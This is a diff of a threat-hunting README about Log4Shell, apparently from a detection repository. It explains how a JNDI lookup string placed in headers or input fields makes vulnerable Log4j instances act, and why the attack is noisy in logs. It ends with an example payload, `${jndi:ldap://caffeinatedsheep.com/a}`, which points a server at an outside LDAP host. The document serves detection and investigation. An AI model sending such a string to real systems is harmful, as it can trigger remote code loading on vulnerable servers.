christian-taillon/log4shell-hunting/README.md

 1. String payload is placed in headers, input fields or query and body parameters.
 2. Software running Log4j processes event or a log of the event containing the string and executes as directed by lookup feature provided by the vulnerable `jndilookup.class`.
 This Java Naming Directory Interface is the API that allows Java Apps to perform searches for objects in their names.
 It is located in the Java Archive file for the particular running Log4j instance.

-This string is sent as input from a client and can be logged in multiple times in multiple palces (one of the challanges about this attack).
+This string is sent as input from a client and can be logged in multiple times in multiple palces (this is one of the challenges about this attack).
 By this nature, the  attack is fairly "noisy" and evidence of attacks in an environment should not be difficult to collect.
-The nature of the attack also provides investigators and hunters a description of what actions the adversary attempted to do instruct the targets to perform.
+The nature of the attack also provides investigators and hunters a description of what actions the adversary attempted to instruct the targets to perform.

 Lets look at an example:
 `${jndi:ldap://caffeinatedsheep.com/a}`